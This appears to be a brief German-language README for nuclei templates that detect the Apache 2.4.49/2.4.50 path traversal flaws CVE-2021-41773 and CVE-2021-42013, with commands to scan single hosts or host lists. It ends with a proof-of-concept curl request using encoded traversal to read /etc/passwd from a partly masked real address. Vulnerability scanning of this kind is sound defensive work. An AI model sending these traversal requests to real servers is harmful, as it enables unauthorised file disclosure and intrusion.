
Erkennt Path-Traversal-Schwachstellen des Apache HTTP Servers (CVE-2021-41773, CVE-2021-42013) durch Prüfung der Offenlegung von /etc/passwd mittels verschiedener Traversal-Techniken.
Apache Version 2.4.49 and 2.4.50
(CVE-2021-41773) and (CVE-2021-42013)
Du brauchst nuclei!
https://github.com/projectdiscovery/nuclei
Überprüfe die lokale nuclei-Installation und verifiziere das Template:
nuclei -t apache-vulnerable-versions.yaml -vv
und
nuclei -t apache-path-traversal-rce-v2.yaml -vv
Du solltest sehen:
[apache-vulnerable-versions] Vulnerable Apache Versions (2.4.49-2.4.50) (@psibot) [high]
und
[apache-path-traversal-passwd] Apache Path Traversal - /etc/passwd Exposure (@psibot) [critical]
Um ein Ziel zu scannen:
nuclei --silent -t apache-vulnerable-versions.yaml -u https://*.*.*.*:port
Um Ziele in einer Datei zu scannen:
nuclei --silent -t apache-vulnerable-versions.yaml -l hosts.txt
apache-vulnerable-versions.yaml - Erkennt die Apache-Version und gibt HIGH aus, wenn anfällig.

apache-path-traversal-rce-v2.yaml - Führt einen Exploit aus und zeigt den anfälligen Pfad. Gibt CRITICAL aus, wenn anfällig.

POC:
curl -s -k https://135.*.120.*:8443/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
